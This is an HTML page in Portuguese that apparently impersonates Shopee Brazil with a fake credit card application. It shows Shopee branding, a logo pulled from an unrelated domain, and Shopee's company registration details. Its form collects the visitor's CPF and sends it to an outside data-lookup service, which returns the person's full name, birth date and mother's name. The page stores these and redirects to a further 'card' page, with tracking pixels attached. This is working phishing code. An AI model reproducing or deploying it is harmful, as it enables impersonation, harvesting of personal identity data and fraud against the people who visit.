﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Cartão Shopee - Solicite o seu</title>
   <link href="../npm/bootstrap%405.3.0/dist/css/bootstrap.min-2.css" rel="stylesheet">
   <link href="https://cdn.jsdelivr.net/npm/remixicon@2.5.0/fonts/remixicon.css" rel="stylesheet">






   <script>
    window.pixelId = "675fc2adbe7dec4a0a382d31";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);
  </script>
  
  
  <script
    src="https://cdn.utmify.com.br/scripts/utms/latest.js"
    data-utmify-prevent-subids
    async
    defer
  ></script>
  
  <!-- Meta Pixel Code -->
  <script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '9027210824040972');
  fbq('track', 'PageView');
  </script>
  <noscript><img height="1" width="1" style="display:none"
  src="https://www.facebook.com/tr?id=9027210824040972&ev=PageView&noscript=1"
  /></noscript>
  <!-- End Meta Pixel Code -->







   <style>
       @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

       body {
           background-color: #f6f6f6;
           color: #1a1a1a;
           font-family: 'Inter', sans-serif;
           line-height: 1.6;
       }

       .header {
           background: #EE4D2D;
           color: #ffffff;
           padding: 1rem 0;
           text-align: center;
           font-size: 1.25rem;
           font-weight: 600;
           grid-area: top-bar;
           box-shadow: 0 2px 4px rgba(0,0,0,0.1);
       }

       .main-content {
           max-width: 480px;
           background-color: #ffffff;
           padding: 2rem;
           border-radius: 12px;
           margin: 0 auto;
           box-shadow: 0 4px 6px rgba(0,0,0,0.05);
           border: 1px solid #f0f0f0;
       }

       .btn-custom {
           position: relative;
           color: #ffffff;
           border: none;
           width: 100%;
           background: linear-gradient(135deg, #EE4D2D 0%, #FF6B4B 100%);
           font-weight: 500;
           border-radius: 8px;
           padding: 0.875rem 2rem;
           font-size: 1rem;
           font-family: 'Inter', sans-serif;
           display: flex;
           align-items: center;
           justify-content: center;
           transition: all 0.3s ease;
       }

       .btn-custom:not(:disabled):hover {
           transform: translateY(-2px);
           box-shadow: 0 4px 12px rgba(238, 77, 45, 0.2);
       }

       .btn-custom:disabled {
           background: linear-gradient(135deg, #EE4D2D 0%, #FF6B4B 100%);
           opacity: 0.7;
           cursor: not-allowed;
       }

       .footer {
           background-color: #1a1a1a;
           color: #f5f5f5;
           text-align: center;
           width: 100%;
           bottom: 0;
           grid-area: footer;
           border-bottom: solid 3px #EE4D2D;
           padding: 2rem 1rem;
           position: relative;
           margin-top: 3rem;
           font-size: 0.875rem;
       }

       .form-label {
           color: #374151;
           font-weight: 500;
           margin-bottom: 0.5rem;
       }

       .form-control {
           padding: 0.875rem;
           border-radius: 8px;
           border: 1px solid #e5e7eb;
           font-size: 1rem;
           transition: all 0.2s ease;
       }

       .form-control:focus {
           border-color: #EE4D2D;
           box-shadow: 0 0 0 2px rgba(238, 77, 45, 0.1);
       }

       .form-control::placeholder {
           color: #9CA3AF;
       }

       .spinner {
           display: none;
           width: 20px;
           height: 20px;
           border: 2px solid #ffffff;
           border-top: 2px solid transparent;
           border-radius: 50%;
           animation: spin 1s linear infinite;
           margin-right: 8px;
       }

       .btn-custom.loading .spinner {
           display: inline-block;
       }

       @keyframes spin {
           0% { transform: rotate(0deg); }
           100% { transform: rotate(360deg); }
       }

       .form-title {
           color: #1F2937;
           font-weight: 600;
           margin-bottom: 1.5rem;
           font-size: 1.125rem;
       }

       @media (max-width: 768px) {
           .main-content {
               margin: 1rem auto;
               padding: 1.5rem;
           }
       }
   </style>
</head>
<body>
<div style="display: grid; grid-template-areas: 'top-bar' 'content' 'footer'; grid-template-rows: auto 1fr auto; min-height: 100vh;">    
   <div class="header">
       <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
   </div>

   <div style="grid-area: content; padding: 0 1rem;"> 
       <div style="margin-top: 40px;" class="main-content">
           <div id="formulario" class="mb-3">
               <p class="form-title">Digite seu CPF para continuar</p>
               <form id="cadastroForm" style="text-align:initial" onsubmit="processarFormulario(event)">
                   <div class="mb-3">
                       <label for="cpf" class="form-label">CPF</label>
                       <input type="text" class="form-control" id="cpf" placeholder="000.000.000-00">
                   </div>
                   <button type="submit" class="btn btn-custom">
                       <div class="spinner"></div>
                       <span>Continuar</span>
                   </button>
               </form>
           </div>
       </div>
   </div> 

   <div class="footer" id="footerChg">
       © 2025 Shopee Brasil. CNPJ: 35.635.824/0001-12<br>
       Av. das Nações Unidas, 3003 - Bonfim, Osasco - SP, 06233-903
   </div>
</div>

<script>

async function processarFormulario(event) {
    event.preventDefault();
    
    const cpf = document.getElementById('cpf').value.replace(/\D/g, '');
    
    if (!cpf) {
        alert('Por favor, digite seu CPF.');
        return;
    }

    const submitButton = document.querySelector('button[type="submit"]');
    const buttonText = submitButton.querySelector('span');
    
    submitButton.classList.add('loading');
    submitButton.disabled = true;
    buttonText.style.display = 'none';

    try {
        const response = await fetch(`https://consulta.fontesderenda.blog/?token=4da265ab-0452-4f87-86be-8d83a04a745a&cpf=${cpf}`);
        const data = await response.json();

        let dadosUsuario;

        if (data && data.DADOS) {
            dadosUsuario = {
                nome: data.DADOS.NOME || "Usuario",
                cpf: data.DADOS.CPF,
                nascimento: data.DADOS.NASC,
                mae: data.DADOS.NOME_MAE
            };
        } else {
            dadosUsuario = {
                nome: "Usuario",
                cpf: cpf,
                nascimento: "",
                mae: ""
            };
        }

        localStorage.setItem('dadosUsuarioUni', JSON.stringify(dadosUsuario));
        location.href = '../card/index.php.html';
        
    } catch (error) {
        console.error('Erro ao consultar a API:', error);
        
        // Fallback em caso de erro
        const dadosUsuario = {
            nome: "Usuario",
            cpf: cpf,
            nascimento: "",
            mae: ""
        };
        
        localStorage.setItem('dadosUsuarioUni', JSON.stringify(dadosUsuario));
        location.href = '../card/index.php.html';
        
    } finally {
        submitButton.classList.remove('loading');
        submitButton.disabled = false;
        buttonText.style.display = 'inline';
    }
}


</script>

<script src="https://cdn.utmify.com.br/scripts/utms/latest.js" data-utmify-prevent-subids async defer></script>
<script>
  window.pixelId = "678838a121a1854bae5e0469";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
<script src="../npm/bootstrap%405.3.0/dist/js/bootstrap.bundle.min-2.js"></script>
</body>
</html>